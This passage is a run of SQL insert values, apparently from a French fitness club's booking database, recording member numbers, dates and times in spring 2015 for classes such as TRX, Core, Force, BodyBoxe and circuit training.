(3460, 31, 'CTR', '2015-02-20', '17h30', '18h00', 'TRX'),
(3439, 40, 'CTR', '2015-02-17', '19h00', '19h30', 'TRX'),
(3440, 40, 'CTR', '2015-02-18', '18h15', '18h45', 'Force'),
(3441, 32, 'CTR', '2015-02-17', '19h00', '19h30', 'TRX'),
(3442, 134, 'CTR', '2015-02-18', '18h15', '18h45', 'Force'),
(3443, 134, 'CTR', '2015-02-19', '17h30', '18h00', 'Core'),
(3444, 34, 'CTR', '2015-02-18', '17h30', '18h', 'Circuit training'),
(3445, 130, 'CTR', '2015-02-18', '18h15', '18h45', 'Force'),
(3446, 26, 'CTR', '2015-02-18', '18h15', '18h45', 'Force'),
(3447, 149, 'CTR', '2015-02-19', '17h30', '18h00', 'Core'),
(3448, 14, 'CTR', '2015-02-19', '18h15', '18h45', 'Circuit training'),
(3449, 32, 'CTR', '2015-02-19', '18h15', '18h45', 'Circuit training'),
(3450, 52, 'CTR', '2015-02-19', '18h15', '18h45', 'Circuit training'),
(3451, 149, 'CTR', '2015-02-19', '17h30', '18h00', 'Core'),
(3452, 149, 'CTR', '2015-02-19', '17h30', '18h00', 'Core'),
(3453, 93, 'CTR', '2015-02-19', '18h15', '18h45', 'Circuit training'),
(3454, 133, 'CTR', '2015-02-19', '18h15', '18h45', 'Circuit training'),
(3461, 30, 'CTR', '2015-02-20', '17h30', '18h00', 'TRX'),
(3480, 37, 'CTR', '2015-02-24', '17h30', '18h00', 'Circuit training'),
(3487, 140, 'CTR', '2015-03-02', '17h30', '18h00', 'Circuit training'),
(3458, 153, 'CTR', '2015-02-20', '17h30', '18h00', 'TRX'),
(3459, 48, 'CTR', '2015-02-20', '17h30', '18h00', 'TRX'),
(3462, 32, 'CTR', '2015-02-20', '17h30', '18h00', 'TRX'),
(3503, 40, 'CTR', '2015-02-26', '17h30', '18h00', 'Core'),
(3464, 143, 'CTR', '2015-02-23', '17h30', '18h00', 'Circuit training'),
(3465, 48, 'CTR', '2015-02-23', '19h00', '19h30', 'Circuit training'),
(3466, 14, 'CTR', '2015-02-23', '17h30', '18h00', 'Circuit training'),
(3467, 93, 'CTR', '2015-02-23', '19h00', '19h30', 'Circuit training'),
(3468, 133, 'CTR', '2015-02-23', '19h00', '19h30', 'Circuit training'),
(3469, 44, 'CTR', '2015-02-23', '17h30', '18h00', 'Circuit training'),
(3472, 130, 'CTR', '2015-02-23', '19h00', '19h30', 'Circuit training'),
(3471, 32, 'CTR', '2015-02-23', '19h00', '19h30', 'Circuit training'),
(3473, 26, 'CTR', '2015-02-23', '19h00', '19h30', 'Circuit training'),
(3488, 154, 'CTR', '2015-02-25', '17h30', '18h', 'Circuit training'),
(3475, 148, 'CTR', '2015-02-23', '17h30', '18h00', 'Circuit training'),
(3477, 65, 'CTR', '2015-02-24', '17h30', '18h00', 'Circuit training'),
(3478, 136, 'CTR', '2015-02-26', '18h15', '18h45', 'Circuit training'),
(3482, 19, 'CTR', '2015-02-24', '17h30', '18h00', 'Circuit training'),
(3483, 140, 'CTR', '2015-02-24', '17h30', '18h00', 'Circuit training'),
(3484, 14, 'CTR', '2015-02-24', '19h00', '19h30', 'TRX'),
(3485, 32, 'CTR', '2015-02-24', '19h00', '19h30', 'TRX'),
(3486, 52, 'CTR', '2015-02-24', '19h00', '19h30', 'TRX'),
(3489, 138, 'CTR', '2015-02-25', '17h30', '18h', 'Circuit training'),
(3490, 97, 'CTR', '2015-02-25', '17h30', '18h', 'Circuit training'),
(3491, 148, 'CTR', '2015-02-25', '19h ', '19h30', 'Circuit training'),
(3492, 34, 'CTR', '2015-02-25', '17h30', '18h', 'Circuit training'),
(3493, 40, 'CTR', '2015-02-25', '19h ', '19h30', 'Circuit training'),
(3494, 38, 'CTR', '2015-02-25', '19h ', '19h30', 'Circuit training'),
(3495, 139, 'CTR', '2015-02-25', '17h30', '18h', 'Circuit training'),
(3496, 37, 'CTR', '2015-02-26', '17h30', '18h00', 'Core'),
(3513, 149, 'CTR', '2015-03-03', '17h30', '18h00', 'Circuit training'),
(3504, 19, 'CTR', '2015-02-26', '17h30', '18h00', 'Core'),
(3500, 44, 'CTR', '2015-02-26', '17h30', '18h00', 'Core'),
(3502, 143, 'CTR', '2015-02-26', '18h15', '18h45', 'Circuit training'),
(3505, 32, 'CTR', '2015-02-26', '18h15', '18h45', 'Circuit training'),
(3506, 31, 'CTR', '2015-03-03', '19h45', '20h15', 'Circuit training'),
(3507, 44, 'CTR', '2015-02-27', '17h30', '18h00', 'TRX'),
(3508, 33, 'CTR', '2015-03-04', '17h30', '18h', 'Circuit training'),
(3509, 63, 'CTR', '2015-02-27', '17h30', '18h00', 'TRX'),
(3510, 50, 'CTR', '2015-02-27', '17h30', '18h00', 'TRX'),
(3511, 47, 'CTR', '2015-02-27', '17h30', '18h00', 'TRX'),
(3512, 30, 'CTR', '2015-02-27', '17h30', '18h00', 'TRX'),
(3514, 143, 'CTR', '2015-03-02', '17h30', '18h00', 'Circuit training'),
(3515, 65, 'CTR', '2015-03-03', '17h30', '18h00', 'Circuit training'),
(3516, 48, 'CTR', '2015-03-02', '19h00', '19h30', 'Circuit training'),
(3517, 93, 'CTR', '2015-03-02', '19h00', '19h30', 'Circuit training'),
(3518, 133, 'CTR', '2015-03-02', '19h00', '19h30', 'Circuit training'),
(3519, 44, 'CTR', '2015-03-02', '17h30', '18h00', 'Circuit training'),
(3520, 14, 'CTR', '2015-03-02', '17h30', '18h00', 'Circuit training'),
(3521, 97, 'CTR', '2015-03-04', '17h30', '18h', 'Circuit training'),
(3522, 32, 'CTR', '2015-03-02', '19h00', '19h30', 'Circuit training'),
(3523, 17, 'CTR', '2015-03-04', '17h30', '18h', 'Circuit training'),
(3524, 48, 'CTR', '2015-03-03', '19h45', '20h15', 'Circuit training'),
(3525, 138, 'CTR', '2015-03-03', '19h45', '20h15', 'Circuit training'),
(3526, 41, 'CTR', '2015-03-03', '19h00', '19h30', 'TRX'),
(3527, 29, 'CTR', '2015-03-03', '17h30', '18h00', 'Circuit training'),
(3528, 14, 'CTR', '2015-03-03', '19h00', '19h30', 'TRX'),
(3529, 31, 'CTR', '2015-03-24', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3530, 154, 'CTR', '2015-03-04', '17h30', '18h', 'Circuit training'),
(3531, 136, 'CTR', '2015-03-04', '17h30', '18h', 'Circuit training'),
(3532, 139, 'CTR', '2015-03-04', '17h30', '18h', 'Circuit training'),
(3533, 44, 'CTR', '2015-03-04', '17h30', '18h', 'Circuit training'),
(3565, 32, 'CTR', '2015-03-10', '19h00', '19h30', 'TRX'),
(3601, 63, 'CTR', '2015-03-13', '17h30', '18h00', 'TRX'),
(3680, 80, 'CTR', '2015-03-25', '19h ', '19h30', 'Circuit training'),
(3538, 14, 'CTR', '2015-03-24', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3600, 48, 'CTR', '2015-03-13', '17h30', '18h00', 'TRX'),
(3598, 47, 'CTR', '2015-03-13', '17h30', '18h00', 'TRX'),
(3599, 50, 'CTR', '2015-03-13', '17h30', '18h00', 'TRX'),
(3542, 31, 'CTR', '2015-03-06', '18h15', '18h45', 'Circuit training'),
(3543, 48, 'CTR', '2015-03-24', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3544, 48, 'CTR', '2015-03-06', '18h15', '18h45', 'Circuit training'),
(3661, 158, 'CTR', '2015-03-20', '17h30', '18h00', 'TRX'),
(3662, 121, 'CTR', '2015-03-20', '18h15', '18h45', 'Circuit training'),
(3546, 63, 'CTR', '2015-03-06', '17h30', '18h00', 'TRX'),
(3547, 30, 'CTR', '2015-03-06', '18h15', '18h45', 'Circuit training'),
(3548, 47, 'CTR', '2015-03-06', '17h30', '18h00', 'TRX'),
(3549, 31, 'CTR', '2015-03-10', '19h45', '20h15', 'Circuit training'),
(3550, 154, 'CTR', '2015-03-11', '17h30', '18h', 'Circuit training'),
(3551, 102, 'CTR', '2015-03-24', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3556, 133, 'CTR', '2015-03-10', '17h30', '18h00', 'Circuit training'),
(3555, 93, 'CTR', '2015-03-10', '17h30', '18h00', 'Circuit training'),
(3554, 48, 'CTR', '2015-03-09', '19h00', '19h30', 'Circuit training'),
(3557, 29, 'CTR', '2015-03-10', '17h30', '18h00', 'Circuit training'),
(3558, 149, 'CTR', '2015-03-10', '17h30', '18h00', 'Circuit training'),
(3596, 31, 'CTR', '2015-03-17', '19h45', '20h15', 'Circuit training'),
(3560, 32, 'CTR', '2015-03-09', '19h00', '19h30', 'Circuit training'),
(3562, 140, 'CTR', '2015-03-10', '17h30', '18h00', 'Circuit training'),
(3563, 48, 'CTR', '2015-03-10', '19h45', '20h15', 'Circuit training'),
(3564, 138, 'CTR', '2015-03-10', '19h45', '20h15', 'Circuit training'),
(3566, 80, 'CTR', '2015-03-24', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3567, 80, 'CTR', '2015-03-24', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3568, 80, 'CTR', '2015-03-24', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3569, 102, 'CTR', '2015-03-10', '19h45', '20h15', 'Circuit training'),
(3570, 52, 'CTR', '2015-03-10', '19h00', '19h30', 'TRX'),
(3571, 56, 'CTR', '2015-03-13', '17h30', '18h00', 'TRX'),
(3572, 41, 'CTR', '2015-03-11', '19h ', '19h30', 'Circuit training'),
(3679, 80, 'CTR', '2015-03-25', '19h ', '19h30', 'Circuit training'),
(3574, 101, 'CTR', '2015-03-10', '19h00', '19h30', 'TRX'),
(3575, 44, 'CTR', '2015-03-10', '19h00', '19h30', 'TRX'),
(3576, 136, 'CTR', '2015-03-11', '17h30', '18h', 'Circuit training'),
(3577, 34, 'CTR', '2015-03-11', '17h30', '18h', 'Circuit training'),
(3578, 97, 'CTR', '2015-03-11', '17h30', '18h', 'Circuit training'),
(3579, 139, 'CTR', '2015-03-11', '17h30', '18h', 'Circuit training'),
(3580, 29, 'CTR', '2015-03-12', '17h30', '18h00', 'Core'),
(3581, 143, 'CTR', '2015-03-12', '18h15', '18h45', 'Circuit training'),
(3582, 103, 'CTR', '2015-03-11', '18h15', '18h45', 'Force'),
(3583, 40, 'CTR', '2015-03-11', '18h15', '18h45', 'Force'),
(3584, 41, 'CTR', '2015-03-24', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3585, 80, 'CTR', '2015-03-24', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3586, 80, 'CTR', '2015-03-24', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3587, 93, 'CTR', '2015-03-12', '18h15', '18h45', 'Circuit training'),
(3588, 133, 'CTR', '2015-03-12', '18h15', '18h45', 'Circuit training'),
(3589, 41, 'CTR', '2015-03-12', '18h15', '18h45', 'Circuit training'),
(3597, 155, 'CTR', '2015-03-12', '17h30', '18h00', 'Core'),
(3591, 17, 'CTR', '2015-03-12', '18h15', '18h45', 'Circuit training'),
(3592, 19, 'CTR', '2015-03-12', '17h30', '18h00', 'Core'),
(3593, 142, 'CTR', '2015-04-02', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3594, 143, 'CTR', '2015-04-02', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3595, 42, 'CTR', '2015-03-24', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3602, 52, 'CTR', '2015-03-13', '18h15', '18h45', 'Circuit training'),
(3603, 44, 'CTR', '2015-03-13', '18h15', '18h45', 'Circuit training'),
(3604, 33, 'CTR', '2015-03-18', '17h30', '18h', 'Circuit training'),
(3605, 140, 'CTR', '2015-03-16', '17h30', '18h00', 'Circuit training'),
(3606, 48, 'CTR', '2015-03-16', '19h00', '19h30', 'Circuit training'),
(3607, 143, 'CTR', '2015-03-16', '17h30', '18h00', 'Circuit training'),
(3608, 151, 'CTR', '2015-03-16', '17h30', '18h00', 'Circuit training'),
(3609, 14, 'CTR', '2015-03-16', '17h30', '18h00', 'Circuit training'),
(3610, 56, 'CTR', '2015-03-16', '17h30', '18h00', 'Circuit training'),
(3611, 32, 'CTR', '2015-03-16', '19h00', '19h30', 'Circuit training'),
(3612, 26, 'CTR', '2015-03-16', '19h00', '19h30', 'Circuit training'),
(3613, 130, 'CTR', '2015-03-16', '19h00', '19h30', 'Circuit training'),
(3614, 44, 'CTR', '2015-03-16', '17h30', '18h00', 'Circuit training'),
(3615, 44, 'CTR', '2015-04-02', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3616, 54, 'CTR', '2015-03-18', '19h ', '19h30', 'Circuit training'),
(3617, 41, 'CTR', '2015-03-17', '19h00', '19h30', 'TRX'),
(3618, 41, 'CTR', '2015-03-18', '19h ', '19h30', 'Circuit training'),
(3657, 56, 'CTR', '2015-03-20', '17h30', '18h00', 'TRX'),
(3620, 41, 'CTR', '2015-03-25', '19h ', '19h30', 'Circuit training'),
(3621, 41, 'CTR', '2015-03-26', '18h15', '18h45', 'Circuit training'),
(3622, 41, 'CTR', '2015-03-31', '19h00', '19h30', 'TRX'),
(3623, 41, 'CTR', '2015-04-01', '19h ', '19h30', 'Circuit training'),
(3624, 53, 'CTR', '2015-03-18', '19h ', '19h30', 'Circuit training'),
(3625, 42, 'CTR', '2015-03-17', '19h00', '19h30', 'TRX'),
(3659, 32, 'CTR', '2015-03-19', '18h15', '18h45', 'Circuit training'),
(3627, 48, 'CTR', '2015-03-17', '19h45', '20h15', 'Circuit training'),
(3628, 138, 'CTR', '2015-03-17', '19h45', '20h15', 'Circuit training'),
(3637, 155, 'CTR', '2015-03-17', '19h00', '19h30', 'TRX'),
(3638, 136, 'CTR', '2015-03-18', '17h30', '18h', 'Circuit training'),
(3639, 31, 'CTR', '2015-03-20', '18h15', '18h45', 'Circuit training'),
(3633, 14, 'CTR', '2015-03-17', '19h00', '19h30', 'TRX'),
(3634, 14, 'CTR', '2015-04-02', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3640, 154, 'CTR', '2015-03-18', '17h30', '18h', 'Circuit training'),
(3641, 97, 'CTR', '2015-03-18', '17h30', '18h', 'Circuit training'),
(3642, 41, 'CTR', '2015-04-07', '19h00', '19h30', 'TRX'),
(3643, 41, 'CTR', '2015-04-08', '19h ', '19h30', 'Circuit training'),
(3644, 151, 'CTR', '2015-03-18', '19h ', '19h30', 'Circuit training'),
(3645, 145, 'CTR', '2015-03-18', '19h ', '19h30', 'Circuit training'),
(3646, 80, 'CTR', '2015-03-18', '19h ', '19h30', 'Circuit training'),
(3647, 80, 'CTR', '2015-03-18', '19h ', '19h30', 'Circuit training'),
(3648, 128, 'CTR', '2015-03-18', '19h ', '19h30', 'Circuit training'),
(3649, 80, 'CTR', '2015-03-18', '19h ', '19h30', 'Circuit training'),
(3650, 47, 'CTR', '2015-03-20', '17h30', '18h00', 'TRX'),
(3651, 34, 'CTR', '2015-03-18', '17h30', '18h', 'Circuit training'),
(3652, 140, 'CTR', '2015-03-23', '17h30', '18h00', 'Circuit training'),
(3653, 29, 'CTR', '2015-03-19', '17h30', '18h00', 'Core'),
(3658, 44, 'CTR', '2015-03-20', '18h15', '18h45', 'Circuit training'),
(3655, 80, 'CTR', '2015-03-19', '17h30', '18h00', 'Core'),
(3656, 19, 'CTR', '2015-03-19', '17h30', '18h00', 'Core'),
(3678, 80, 'CTR', '2015-03-25', '19h ', '19h30', 'Circuit training'),
(3663, 32, 'CTR', '2015-03-20', '17h30', '18h00', 'TRX'),
(3664, 80, 'CTR', '2015-03-24', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3665, 80, 'CTR', '2015-03-24', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3746, 29, 'CTR', '2015-04-07', '17h30', '18h00', 'Circuit training'),
(3667, 48, 'CTR', '2015-03-23', '19h00', '19h30', 'Circuit training'),
(3668, 143, 'CTR', '2015-03-23', '19h00', '19h30', 'Circuit training'),
(3669, 14, 'CTR', '2015-03-23', '17h30', '18h00', 'Circuit training'),
(3670, 14, 'CTR', '2015-03-26', '19h00', '19h30', 'BodyBoxe'),
(3671, 44, 'CTR', '2015-03-23', '17h30', '18h00', 'Circuit training'),
(3672, 97, 'CTR', '2015-03-25', '17h30', '18h', 'Circuit training'),
(3673, 30, 'CTR', '2015-04-02', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3674, 54, 'CTR', '2015-03-25', '18h15', '18h45', 'Force'),
(3675, 154, 'CTR', '2015-03-25', '17h30', '18h', 'Circuit training'),
(3676, 134, 'CTR', '2015-03-25', '17h30', '18h', 'Circuit training'),
(3677, 31, 'CTR', '2015-03-31', '19h45', '20h15', 'Circuit training'),
(3681, 158, 'CTR', '2015-03-25', '17h30', '18h', 'Circuit training'),
(3682, 155, 'CTR', '2015-03-25', '18h15', '18h45', 'Force'),
(3683, 151, 'CTR', '2015-03-25', '19h ', '19h30', 'Circuit training'),
(3684, 143, 'CTR', '2015-03-26', '18h15', '18h45', 'Circuit training'),
(3685, 139, 'CTR', '2015-03-25', '17h30', '18h', 'Circuit training'),
(3686, 103, 'CTR', '2015-03-25', '19h ', '19h30', 'Circuit training'),
(3687, 136, 'CTR', '2015-03-26', '18h15', '18h45', 'Circuit training'),
(3688, 160, 'CTR', '2015-03-26', '18h15', '18h45', 'Circuit training'),
(3689, 105, 'CTR', '2015-03-26', '19h00', '19h30', 'BodyBoxe'),
(3690, 92, 'CTR', '2015-03-26', '19h00', '19h30', 'BodyBoxe'),
(3691, 138, 'CTR', '2015-03-26', '19h00', '19h30', 'BodyBoxe'),
(3692, 155, 'CTR', '2015-03-26', '17h30', '18h00', 'Core'),
(3693, 106, 'CTR', '2015-03-26', '19h00', '19h30', 'BodyBoxe'),
(3695, 44, 'CTR', '2015-03-26', '17h30', '18h00', 'Core'),
(3696, 17, 'CTR', '2015-03-26', '19h00', '19h30', 'BodyBoxe'),
(3698, 32, 'CTR', '2015-03-26', '18h15', '18h45', 'Circuit training'),
(3699, 102, 'CTR', '2015-03-26', '19h00', '19h30', 'BodyBoxe'),
(3702, 48, 'CTR', '2015-03-30', '19h00', '19h30', 'Circuit training'),
(3701, 44, 'CTR', '2015-03-30', '19h00', '19h30', 'Circuit training'),
(3703, 138, 'CTR', '2015-03-30', '19h00', '19h30', 'Circuit training'),
(3704, 137, 'CTR', '2015-03-31', '16h45', '17h15', 'BodyBoxe'),
(3709, 14, 'CTR', '2015-03-30', '19h00', '19h30', 'Circuit training'),
(3711, 80, 'CTR', '2015-04-01', '18h15', '18h45', 'Force'),
(3710, 80, 'CTR', '2015-04-01', '18h15', '18h45', 'Force'),
(3708, 102, 'CTR', '2015-03-30', '19h00', '19h30', 'Circuit training'),
(3712, 48, 'CTR', '2015-03-31', '19h45', '20h15', 'Circuit training'),
(3713, 19, 'CTR', '2015-03-31', '16h45', '17h15', 'BodyBoxe'),
(3714, 80, 'CTR', '2015-03-31', '16h45', '17h15', 'BodyBoxe'),
(3715, 80, 'CTR', '2015-03-31', '16h45', '17h15', 'BodyBoxe'),
(3716, 80, 'CTR', '2015-04-01', '19h ', '19h30', 'Circuit training'),
(3717, 80, 'CTR', '2015-04-01', '19h ', '19h30', 'Circuit training'),
(3718, 80, 'CTR', '2015-04-01', '19h ', '19h30', 'Circuit training'),
(3719, 104, 'CTR', '2015-04-01', '18h15', '18h45', 'Force'),
(3720, 49, 'CTR', '2015-04-01', '18h15', '18h45', 'Force'),
(3721, 140, 'CTR', '2015-03-31', '17h30', '18h00', 'Circuit training'),
(3723, 32, 'CTR', '2015-03-31', '19h00', '19h30', 'TRX'),
(3724, 52, 'CTR', '2015-03-31', '19h00', '19h30', 'TRX'),
(3725, 155, 'CTR', '2015-03-31', '19h00', '19h30', 'TRX'),
(3726, 14, 'CTR', '2015-03-31', '19h00', '19h30', 'TRX'),
(3739, 92, 'CTR', '2015-04-02', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3728, 41, 'CTR', '2015-04-21', '19h00', '19h30', 'TRX'),
(3741, 140, 'CTR', '2015-04-07', '17h30', '18h00', 'Circuit training'),
(3730, 138, 'CTR', '2015-04-01', '19h ', '19h30', 'Circuit training'),
(3731, 155, 'CTR', '2015-04-01', '18h15', '18h45', 'Force'),
(3732, 154, 'CTR', '2015-04-01', '17h30', '18h', 'Circuit training'),
(3733, 156, 'CTR', '2015-04-01', '17h30', '18h', 'Circuit training'),
(3734, 103, 'CTR', '2015-04-01', '18h15', '18h45', 'Force'),
(3735, 105, 'CTR', '2015-04-02', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3736, 139, 'CTR', '2015-04-01', '17h30', '18h', 'Circuit training'),
(3737, 34, 'CTR', '2015-04-01', '17h30', '18h', 'Circuit training'),
(3738, 102, 'CTR', '2015-04-02', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3740, 29, 'CTR', '2015-04-02', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)'),
(3742, 31, 'CTR', '2015-04-07', '19h45', '20h15', 'Circuit training'),
(3743, 104, 'CTR', '2015-04-08', '18h15', '18h45', 'Force'),
(3744, 162, 'CTR', '2015-04-08', '18h15', '18h45', 'Force'),
(3745, 161, 'CTR', '2015-04-08', '18h15', '18h45', 'Force'),
(3747, 155, 'CTR', '2015-04-07', '19h00', '19h30', 'TRX'),
(3748, 32, 'CTR', '2015-04-07', '19h00', '19h30', 'TRX'),
(3749, 52, 'CTR', '2015-04-07', '19h00', '19h30', 'TRX'),
(3750, 56, 'CTR', '2015-04-07', '17h30', '18h00', 'Circuit training'),
(3751, 163, 'CTR', '2015-04-07', '17h30', '18h00', 'Circuit training'),
(3752, 154, 'CTR', '2015-04-08', '17h30', '18h', 'Circuit training'),
(3753, 29, 'CTR', '2015-04-08', '18h15', '18h45', 'Force'),
(3754, 34, 'CTR', '2015-04-08', '17h30', '18h', 'Circuit training'),
(3764, 165, 'CTR', '2015-04-14', '19h45', '20h15', 'Circuit training'),
(3757, 105, 'CTR', '2015-04-09', '17h30', '18h00', 'Core'),
(3759, 31, 'CTR', '2015-04-14', '19h45', '20h15', 'Circuit training'),
(3765, 48, 'CTR', '2015-04-14', '19h45', '20h15', 'Circuit training'),
(3763, 164, 'CTR', '2015-04-14', '19h45', '20h15', 'Circuit training'),
(3762, 14, 'CTR', '2015-04-16', '19h00', '19h30', 'BodyBoxe'),
(3766, 138, 'CTR', '2015-04-14', '19h45', '20h15', 'Circuit training'),
(3767, 138, 'CTR', '2015-04-16', '19h00', '19h30', 'BodyBoxe'),
(3768, 14, 'CTR', '2015-04-14', '19h00', '19h30', 'TRX'),
(3769, 102, 'CTR', '2015-04-14', '19h45', '20h15', 'Circuit training'),
(3771, 80, 'CTR', '2015-04-16', '17h30', '18h00', 'Core'),
(3772, 48, 'CTR', '2015-04-15', '19h ', '19h30', 'Circuit training'),
(3777, 140, 'CTR', '2015-04-15', '19h ', '19h30', 'Circuit training'),
(3774, 31, 'CTR', '2015-04-17', '17h30', '18h00', 'TRX'),
(3778, 80, 'CTR', '2015-04-15', '19h ', '19h30', 'Circuit training'),
(3785, 31, 'CTR', '2015-04-21', '19h45', '20h15', 'Circuit training'),
(3779, 80, 'CTR', '2015-04-15', '19h ', '19h30', 'Circuit training'),
(3780, 30, 'CTR', '2015-04-17', '17h30', '18h00', 'TRX'),
(3781, 29, 'CTR', '2015-04-16', '17h30', '18h00', 'Core'),
(3782, 48, 'CTR', '2015-04-17', '17h30', '18h00', 'TRX'),
(3783, 102, 'CTR', '2015-04-16', '19h00', '19h30', 'BodyBoxe'),
(3784, 105, 'CTR', '2015-04-16', '19h00', '19h30', 'BodyBoxe'),
(3786, 44, 'CTR', '2015-04-20', '17h30', '18h00', 'Circuit training'),
(3787, 48, 'CTR', '2015-04-20', '19h00', '19h30', 'Circuit training'),
(3788, 143, 'CTR', '2015-04-20', '17h30', '18h00', 'Circuit training'),
(3789, 140, 'CTR', '2015-04-20', '17h30', '18h00', 'Circuit training'),
(3790, 156, 'CTR', '2015-04-21', '16h45', '17h15', 'BodyBoxe'),
(3791, 28, 'CTR', '2015-04-20', '17h30', '18h00', 'Circuit training'),
(3792, 14, 'CTR', '2015-04-20', '17h30', '18h00', 'Circuit training'),
(3793, 14, 'CTR', '2015-04-21', '19h00', '19h30', 'TRX'),
(3794, 14, 'CTR', '2015-04-21', '18h15', '18h45', 'Circuit training'),
(3795, 48, 'CTR', '2015-04-21', '19h45', '20h15', 'Circuit training'),
(3796, 29, 'CTR', '2015-04-21', '17h30', '18h00', 'Circuit training'),
(3797, 104, 'CTR', '2015-04-22', '18h15', '18h45', 'Force'),
(3798, 137, 'CTR', '2015-04-21', '16h45', '17h15', 'BodyBoxe'),
(3826, 28, 'CTR', '2015-05-04', '17h30', '18h00', 'Circuit training'),
(3800, 162, 'CTR', '2015-04-22', '18h15', '18h45', 'Force'),
(3801, 149, 'CTR', '2015-04-21', '18h15', '18h45', 'Circuit training'),
(3802, 155, 'CTR', '2015-04-21', '19h00', '19h30', 'TRX'),
(3803, 32, 'CTR', '2015-04-21', '19h00', '19h30', 'TRX'),
(3804, 166, 'CTR', '2015-04-23', '17h30', '18h00', 'Core'),
(3805, 80, 'CTR', '2015-04-22', '18h15', '18h45', 'Force'),
(3806, 80, 'CTR', '2015-04-22', '19h ', '19h30', 'Circuit training'),
(3807, 29, 'CTR', '2015-04-23', '17h30', '18h00', 'Core'),
(3824, 48, 'CTR', '2015-04-24', '18h15', '18h45', 'Circuit training'),
(3809, 154, 'CTR', '2015-04-22', '17h30', '18h', 'Circuit training'),
(3810, 34, 'CTR', '2015-04-22', '17h30', '18h', 'Circuit training'),
(3811, 28, 'CTR', '2015-04-22', '17h30', '18h', 'Circuit training'),
(3812, 156, 'CTR', '2015-04-22', '19h ', '19h30', 'Circuit training'),
(3813, 139, 'CTR', '2015-04-22', '17h30', '18h', 'Circuit training'),
(3814, 31, 'CTR', '2015-04-24', '18h15', '18h45', 'Circuit training'),
(3815, 31, 'CTR', '2015-04-28', '19h45', '20h15', 'Circuit training'),
(3816, 97, 'CTR', '2015-04-22', '17h30', '18h', 'Circuit training'),
(3817, 156, 'CTR', '2015-04-22', '19h ', '19h30', 'Circuit training'),
(3818, 158, 'CTR', '2015-04-23', '17h30', '18h00', 'Core'),
(3819, 44, 'CTR', '2015-04-23', '17h30', '18h00', 'Core'),
(3820, 164, 'CTR', '2015-04-23', '17h30', '18h00', 'Core'),
(3821, 165, 'CTR', '2015-04-23', '17h30', '18h00', 'Core'),
(3823, 105, 'CTR', '2015-04-23', '17h30', '18h00', 'Core'),
(3825, 169, 'CTR', '2015-04-24', '18h15', '18h45', 'Circuit training'),
(3827, 28, 'CTR', '2015-05-06', '17h30', '18h', 'Circuit training'),
(3828, 143, 'CTR', '2015-04-27', '17h30', '18h00', 'Circuit training'),
(3829, 48, 'CTR', '2015-04-27', '19h00', '19h30', 'Circuit training'),
(3830, 134, 'CTR', '2015-04-27', '17h30', '18h00', 'Circuit training'),
(3831, 140, 'CTR', '2015-04-27', '17h30', '18h00', 'Circuit training'),
(3832, 164, 'CTR', '2015-04-27', '17h30', '18h00', 'Circuit training'),
(3833, 165, 'CTR', '2015-04-27', '17h30', '18h00', 'Circuit training'),
(3834, 44, 'CTR', '2015-04-27', '17h30', '18h00', 'Circuit training'),
(3835, 14, 'CTR', '2015-04-27', '17h30', '18h00', 'Circuit training'),
(3836, 14, 'CTR', '2015-04-28', '18h15', '18h45', 'Circuit training'),
(3837, 14, 'CTR', '2015-04-28', '19h00', '19h30', 'TRX'),
(3838, 138, 'CTR', '2015-04-27', '19h00', '19h30', 'Circuit training'),
(3839, 48, 'CTR', '2015-04-28', '19h45', '20h15', 'Circuit training'),
(3840, 29, 'CTR', '2015-04-28', '17h30', '18h00', 'Circuit training'),
(3841, 32, 'CTR', '2015-04-28', '17h30', '18h00', 'Circuit training'),
(3842, 104, 'CTR', '2015-04-29', '18h15', '18h45', 'Force'),
(3844, 80, 'CTR', '2015-04-29', '18h15', '18h45', 'Force'),
(3845, 169, 'CTR', '2015-04-29', '19h ', '19h30', 'Circuit training'),
(3846, 119, 'CTR', '2015-04-29', '18h15', '18h45', 'Force'),
(3847, 168, 'CTR', '2015-04-29', '18h15', '18h45', 'Force'),
(3850, 143, 'CTR', '2015-05-04', '17h30', '18h00', 'Circuit training'),
(3849, 162, 'CTR', '2015-04-29', '18h15', '18h45', 'Force'),
(3851, 29, 'CTR', '2015-05-05', '17h30', '18h00', 'Circuit training'),
(3863, 32, 'CTR', '2015-05-05', '18h15', '18h45', 'Circuit training'),
(3853, 48, 'CTR', '2015-05-04', '19h00', '19h30', 'Circuit training'),
(3854, 44, 'CTR', '2015-05-04', '17h30', '18h00', 'Circuit training'),
(3855, 48, 'CTR', '2015-05-05', '19h45', '20h15', 'Circuit training'),
(3856, 140, 'CTR', '2015-05-05', '17h30', '18h00', 'Circuit training'),
(3857, 169, 'CTR', '2015-05-05', '19h45', '20h15', 'Circuit training'),
(3858, 56, 'CTR', '2015-05-08', '17h30', '18h00', 'TRX'),
(3862, 19, 'CTR', '2015-05-05', '17h30', '18h00', 'Circuit training'),
(3861, 14, 'CTR', '2015-05-07', '19h00', '19h30', 'BodyBoxe'),
